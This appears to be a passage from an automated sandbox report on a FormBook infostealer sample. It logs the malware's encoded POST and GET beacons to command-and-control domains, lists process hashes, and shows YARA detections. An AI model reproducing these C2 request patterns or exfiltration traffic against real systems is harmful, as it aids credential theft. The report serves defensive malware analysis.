                                                                                      Origin: http://www.rtpterbaruwaktu3.xyz
                                                                                      Referer: http://www.rtpterbaruwaktu3.xyz/v6un/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1247
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 52 6a 44 31 61 41 76 6e 4c 6c 4f 39 46 41 70 2b 69 58 7a 48 74 30 36 45 43 52 62 4d 62 38 72 39 2b 53 32 64 77 50 39 78 4f 49 39 4d 71 56 58 2f 6a 65 4e 6b 70 63 79 61 51 6e 41 34 48 39 4b 6d 74 2f 5a 38 7a 69 4a 31 62 45 4e 46 69 30 6c 2b 54 63 4c 4d 32 45 6c 4c 73 66 56 53 62 79 39 47 37 6c 33 57 59 43 52 74 41 2b 57 36 4e 6f 4f 74 74 30 71 6c 6f 71 2f 78 66 6c 71 71 35 62 36 4d 56 71 69 69 4a 52 70 72 65 72 6b 6b 78 6e 48 71 62 55 47 31 52 37 76 79 65 71 5a 33 71 4c 2f 35 42 5a 6e 30 69 71 4d 36 44 74 5a 38 6f 7a 75 51 7a 39 6a 59 61 73 31 51 72 73 2f 33 57 41 74 30 78 73 76 49 2b 72 33 34 66 51 6f 43 72 75 43 4f 64 58 74 63 4f 36 42 58 53 66 31 64 45 6f 6f 44 63 36 44 66 4c 61 35 36 6c 4e 72 50 66 73 53 4c 77 53 4c 6d 32 61 35 59 53 2b 69 39 63 49 6c 43 62 47 57 46 4b 6d 77 50 41 34 51 74 69 73 42 49 49 50 42 30 2f 2b 2b 61 4d 5a 62 66 42 30 38 45 4a 38 56 45 62 6c 78 57 51 4e 69 32 31 73 6b 53 2b 57 59 45 33 59 6d 34 79 56 58 72 44 67 71 37 73 71 6f 44 2f 64 4b 56 58 48 7a [TRUNCATED]
                                                                                      Data Ascii: 9jtPKX=RjD1aAvnLlO9FAp+iXzHt06ECRbMb8r9+S2dwP9xOI9MqVX/jeNkpcyaQnA4H9Kmt/Z8ziJ1bENFi0l+TcLM2ElLsfVSby9G7l3WYCRtA+W6NoOtt0qloq/xflqq5b6MVqiiJRprerkkxnHqbUG1R7vyeqZ3qL/5BZn0iqM6DtZ8ozuQz9jYas1Qrs/3WAt0xsvI+r34fQoCruCOdXtcO6BXSf1dEooDc6DfLa56lNrPfsSLwSLm2a5YS+i9cIlCbGWFKmwPA4QtisBIIPB0/++aMZbfB08EJ8VEblxWQNi21skS+WYE3Ym4yVXrDgq7sqoD/dKVXHzSxXmuKDTSQfH5WlYi1WR+lKCN/xmjxNpwgx2ezvMu+d30tkj4Mv7dc8810OBw88du19PDBFdVe6aR3R2t3qra6cCkctAXtU7m9YwtBUyWHBOrCi5e5tTiyg2bYNc+8lgRFZ1LZs6Gmk/YsPwR1xyXCIGe9BkpyZ3oCB2SLZFLESv70z8+z/fERFThQlti0WUda/i4f0qV572YxEQQVxl+5/FoH7up/yhFZLJ39Bqq4w4XUo5e0XEV84iXfeSm4UNp1cNiMxxcZE+HqxJxuzuC8kY8r0nuf0YsBe+68WJt/e+p74i0pucqbmstrqW02PXJA4MNrGwcmFNKgVOl2z8PDm0Cz4pFKAyOR5s0GZNxriKw9qQfaldWYVX0oZh+gdQwgfBdW2qApseZYT71DPlSGld8D9KUL8GAcsW7MLtz8g7JQd3olORTHqjQMaR+TMTeHFPokAhZ6OHG2Jnurm5e8o20/yS5iBto1VLBSOm6dAf56OSUYlcFRLbs1unknU84rNo1poJ5nduVkZV3JB3T0T0v4YHgiCyTT+daJeONBmWNSI2ScrcNkNWl7IehilQXk6xvL+gv3MnIeHwYrMvemTGZ1ha1w2Rkw5GYPRX9c1ArmsoQNCrYJ8Gz0U0x+VMuD9TCI7/+0p+vMjtwNxcKQF36DixY2Vtw+ [TRUNCATED]
                                                                                      Sep 30, 2024 10:44:54.368901014 CEST1033INHTTP/1.1 404 Not Found
                                                                                      Connection: close
                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                      pragma: no-cache
                                                                                      content-type: text/html
                                                                                      content-length: 796
                                                                                      date: Mon, 30 Sep 2024 08:44:54 GMT
                                                                                      server: LiteSpeed
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      44192.168.2.658820103.21.221.87802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:44:55.986051083 CEST512OUTGET /v6un/?9jtPKX=chrVZ32YOFiHcRt+pEb6q26+CAONXtiHqnqOnPUfdfA3+GbGusUCqNq3OHoqQeyHuv1nxnx1V1BB8mdZJamKpk9z9Ox4e3tyzXPmXAU3O+O4NKGvlCfVuqLBbErpx4XOfLWdLVU=&YDT4P=4xd8DzO HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.rtpterbaruwaktu3.xyz
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Sep 30, 2024 10:44:56.893110037 CEST1033INHTTP/1.1 404 Not Found
                                                                                      Connection: close
                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                      pragma: no-cache
                                                                                      content-type: text/html
                                                                                      content-length: 796
                                                                                      date: Mon, 30 Sep 2024 08:44:56 GMT
                                                                                      server: LiteSpeed
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      45192.168.2.6588213.33.130.190802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:45:02.011888981 CEST790OUTPOST /zeyp/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.mondayigboleague.info
                                                                                      Origin: http://www.mondayigboleague.info
                                                                                      Referer: http://www.mondayigboleague.info/zeyp/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 211
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 64 72 51 33 39 38 42 55 65 75 45 41 33 66 32 37 79 74 41 2f 44 32 4d 72 33 6f 57 4a 55 44 6f 68 67 77 61 6c 30 61 79 55 2f 67 36 74 62 4b 36 2b 45 48 64 4e 2b 4a 2b 52 44 79 43 61 57 78 4b 6b 2b 64 4e 55 41 54 74 41 47 4c 72 6b 5a 33 4a 76 4a 50 2b 45 52 35 5a 6b 33 57 4b 4a 55 57 30 66 42 32 2f 49 75 45 42 33 61 65 36 4f 70 7a 75 58 6e 77 30 31 46 4d 75 43 54 68 36 6e 73 66 6d 38 48 78 51 4d 65 6a 72 6a 6c 37 4e 6a 31 2f 74 2b 2b 53 51 74 63 4b 45 33 30 76 4a 76 56 62 38 35 47 43 72 57 6b 31 59 64 43 72 68 31 53 31 52 31 76 38 54 4c 6c 36 53 6c 58 59 61 58 76 4e 43 63 6b 75 6b 36 35 46 77 48 6b 70 34 7a
                                                                                      Data Ascii: 9jtPKX=drQ398BUeuEA3f27ytA/D2Mr3oWJUDohgwal0ayU/g6tbK6+EHdN+J+RDyCaWxKk+dNUATtAGLrkZ3JvJP+ER5Zk3WKJUW0fB2/IuEB3ae6OpzuXnw01FMuCTh6nsfm8HxQMejrjl7Nj1/t++SQtcKE30vJvVb85GCrWk1YdCrh1S1R1v8TLl6SlXYaXvNCckuk65FwHkp4z


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      46192.168.2.6588223.33.130.190802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:45:04.549846888 CEST814OUTPOST /zeyp/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.mondayigboleague.info
                                                                                      Origin: http://www.mondayigboleague.info
                                                                                      Referer: http://www.mondayigboleague.info/zeyp/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 235
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 64 72 51 33 39 38 42 55 65 75 45 41 33 2b 47 37 2b 71 30 2f 45 57 4d 6f 79 6f 57 4a 50 7a 6f 6c 67 77 65 6c 30 66 4b 2b 38 53 65 74 62 71 4b 2b 46 47 64 4e 39 4a 2b 52 4c 53 44 65 4c 42 4b 72 2b 64 52 63 41 52 4a 41 47 4c 76 6b 5a 31 68 76 4a 38 57 48 52 70 5a 71 72 57 4b 4c 4c 6d 30 66 42 32 2f 49 75 45 55 2f 61 59 53 4f 6f 48 53 58 6c 52 30 71 62 38 75 42 55 68 36 6e 6f 66 6d 34 48 78 51 2b 65 69 33 46 6c 2f 39 6a 31 39 6c 2b 2b 47 45 69 56 4b 45 78 35 50 49 2f 53 37 4a 4f 48 41 71 56 73 55 4d 6b 65 37 6b 66 58 44 51 76 7a 50 54 6f 33 71 79 6e 58 61 43 6c 76 74 43 32 6d 75 63 36 72 53 38 67 72 64 64 51 42 53 6d 68 66 69 30 4b 54 36 49 38 42 55 45 79 45 45 4e 58 34 41 3d 3d
                                                                                      Data Ascii: 9jtPKX=drQ398BUeuEA3+G7+q0/EWMoyoWJPzolgwel0fK+8SetbqK+FGdN9J+RLSDeLBKr+dRcARJAGLvkZ1hvJ8WHRpZqrWKLLm0fB2/IuEU/aYSOoHSXlR0qb8uBUh6nofm4HxQ+ei3Fl/9j19l++GEiVKEx5PI/S7JOHAqVsUMke7kfXDQvzPTo3qynXaClvtC2muc6rS8grddQBSmhfi0KT6I8BUEyEENX4A==


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      47192.168.2.6588233.33.130.190802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:45:07.097801924 CEST1827OUTPOST /zeyp/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.mondayigboleague.info
                                                                                      Origin: http://www.mondayigboleague.info
                                                                                      Referer: http://www.mondayigboleague.info/zeyp/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1247
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 64 72 51 33 39 38 42 55 65 75 45 41 33 2b 47 37 2b 71 30 2f 45 57 4d 6f 79 6f 57 4a 50 7a 6f 6c 67 77 65 6c 30 66 4b 2b 38 53 57 74 62 59 43 2b 45 6c 6c 4e 7a 70 2b 52 42 79 44 54 4c 42 4b 4d 2b 64 5a 59 41 52 46 32 47 4a 6e 6b 57 30 42 76 50 4e 57 48 61 70 5a 71 67 32 4b 49 55 57 30 77 42 32 75 50 75 45 45 2f 61 59 53 4f 6f 47 43 58 73 67 30 71 5a 38 75 43 54 68 36 6a 73 66 6e 6c 48 78 49 45 65 69 6a 7a 6c 4f 42 6a 30 65 4e 2b 39 31 38 69 55 71 45 7a 33 76 4a 36 53 37 56 52 48 41 32 33 73 55 34 4f 65 38 73 66 54 57 64 6c 69 65 33 49 72 37 57 6e 57 70 47 4f 30 71 2b 63 76 64 34 55 72 52 30 6e 72 73 42 48 66 33 44 39 64 67 70 58 47 72 45 72 4a 7a 6c 46 51 55 38 65 36 34 4d 7a 69 68 5a 41 36 57 70 6f 68 43 55 35 56 36 79 66 38 6c 6b 55 2b 4b 61 6c 6b 52 52 71 75 71 70 50 49 47 46 45 32 4a 52 47 41 4b 55 54 67 52 69 6b 56 2b 59 56 52 41 33 66 2b 68 63 59 77 55 50 58 4b 65 33 67 41 41 61 41 50 39 74 2f 44 64 66 68 65 6b 4f 2f 2f 55 48 48 39 52 32 42 50 52 69 6a 77 54 37 4d 6a 49 75 [TRUNCATED]
                                                                                      Data Ascii: 9jtPKX=drQ398BUeuEA3+G7+q0/EWMoyoWJPzolgwel0fK+8SWtbYC+EllNzp+RByDTLBKM+dZYARF2GJnkW0BvPNWHapZqg2KIUW0wB2uPuEE/aYSOoGCXsg0qZ8uCTh6jsfnlHxIEeijzlOBj0eN+918iUqEz3vJ6S7VRHA23sU4Oe8sfTWdlie3Ir7WnWpGO0q+cvd4UrR0nrsBHf3D9dgpXGrErJzlFQU8e64MzihZA6WpohCU5V6yf8lkU+KalkRRquqpPIGFE2JRGAKUTgRikV+YVRA3f+hcYwUPXKe3gAAaAP9t/DdfhekO//UHH9R2BPRijwT7MjIuiFQz8VUUWQIkBRageV5QMFTaKCMgMkAXYxmesjloOWXZNuSRolDn8YyDsWwkaDCrpAtTCYwwVOplTgQEoJpHN7unNkA2ZXeQaJqR51PnLTjcWNzmXohQtfUQuXLKgAiKcp1d5QVLzlD99/kP2ycfOF19A4rJMMcghV+kX9Qg9yhsUyKqYzymM+IKaDoE9wMB1pYVeaJDl/G0Gn1Yi7OyWpwE2n8MUvK0qHqqC+CSFqMZgvTFgG8rGz5xvHsN8jaYZpFmZVw1fVhN5GvcwgbI3MOjKl1Isa+cDYLhw7aqlHMSoGg/fXnSQCPnTnRBcXT3A6Tp21qfRubu4oPJ0pWytXYfY100G12cF3T0nwnn5iZRCCZstLgoL7lhFJ2qGvakP5WRULgUJeJDmHMwH0h3a6csT1Q3ME9Ij1eV/XG9vC2dLwvllhIVTwSu3W+bTe2l/+UJBBiHoQwdVqEJNVbCiW8R4TxHlGDLJ8WXS9cuaBFxs4GGMwDVmgewoS591QPdeHy59TsjVhfNenMRjVe5Wsx7Yf+oc4HKFbnesw+o6tueIAB4NEJfFvPl+BqmCDwBUMm9iIIPfQ1ahdJi4ty0y3VkhG5bh2IXiQyrYAH6JRVHxRWiQDGAsd4uvqgryVwTk29QiJzyNMEZM1ZwQ2VWP8TfU5aJ2ixYEr [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      48192.168.2.6588243.33.130.190802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:45:10.167176962 CEST513OUTGET /zeyp/?9jtPKX=Qp4X+LIjfewVnP6Y/skPG2AcibCDaQ9iuVCW0N7JhhnFM66mIUNO5YOiETDrAwi/zOtbLxRIZ8WmNUxfXqqXG7p6mEX8KWQILlPapVZ7FdK1llaTtR9WIeGVSAX1maOrISYOTkE=&YDT4P=4xd8DzO HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.mondayigboleague.info
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Sep 30, 2024 10:45:10.616065025 CEST412INHTTP/1.1 200 OK
                                                                                      Server: openresty
                                                                                      Date: Mon, 30 Sep 2024 08:45:10 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 272
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 39 6a 74 50 4b 58 3d 51 70 34 58 2b 4c 49 6a 66 65 77 56 6e 50 36 59 2f 73 6b 50 47 32 41 63 69 62 43 44 61 51 39 69 75 56 43 57 30 4e 37 4a 68 68 6e 46 4d 36 36 6d 49 55 4e 4f 35 59 4f 69 45 54 44 72 41 77 69 2f 7a 4f 74 62 4c 78 52 49 5a 38 57 6d 4e 55 78 66 58 71 71 58 47 37 70 36 6d 45 58 38 4b 57 51 49 4c 6c 50 61 70 56 5a 37 46 64 4b 31 6c 6c 61 54 74 52 39 57 49 65 47 56 53 41 58 31 6d 61 4f 72 49 53 59 4f 54 6b 45 3d 26 59 44 54 34 50 3d 34 78 64 38 44 7a 4f 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?9jtPKX=Qp4X+LIjfewVnP6Y/skPG2AcibCDaQ9iuVCW0N7JhhnFM66mIUNO5YOiETDrAwi/zOtbLxRIZ8WmNUxfXqqXG7p6mEX8KWQILlPapVZ7FdK1llaTtR9WIeGVSAX1maOrISYOTkE=&YDT4P=4xd8DzO"}</script></head></html>


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:04:41:04
                                                                                      Start date:30/09/2024
                                                                                      Path:C:\Users\user\Desktop\P030092024LANDWAY.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\P030092024LANDWAY.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:1'054'545 bytes
                                                                                      MD5 hash:3FFB03EF28AFF93D8CD6B83911D700EE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:2
                                                                                      Start time:04:41:10
                                                                                      Start date:30/09/2024
                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\P030092024LANDWAY.exe"
                                                                                      Imagebase:0xd00000
                                                                                      File size:46'504 bytes
                                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2490404143.00000000036D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2490404143.00000000036D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2490732438.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2490732438.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:6
                                                                                      Start time:04:41:31
                                                                                      Start date:30/09/2024
                                                                                      Path:C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe"
                                                                                      Imagebase:0x840000
                                                                                      File size:140'800 bytes
                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4606443836.0000000002510000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4606443836.0000000002510000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:7
                                                                                      Start time:04:41:34
                                                                                      Start date:30/09/2024
                                                                                      Path:C:\Windows\SysWOW64\cmdl32.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\SysWOW64\cmdl32.exe"
                                                                                      Imagebase:0x160000
                                                                                      File size:46'592 bytes
                                                                                      MD5 hash:BD60DF43E6419AFE39B3FCBFB14077E7
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4607447719.0000000004390000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4607447719.0000000004390000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4607493731.00000000043E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4607493731.00000000043E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      Reputation:moderate
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:9
                                                                                      Start time:04:41:46
                                                                                      Start date:30/09/2024
                                                                                      Path:C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe"
                                                                                      Imagebase:0x840000
                                                                                      File size:140'800 bytes
                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
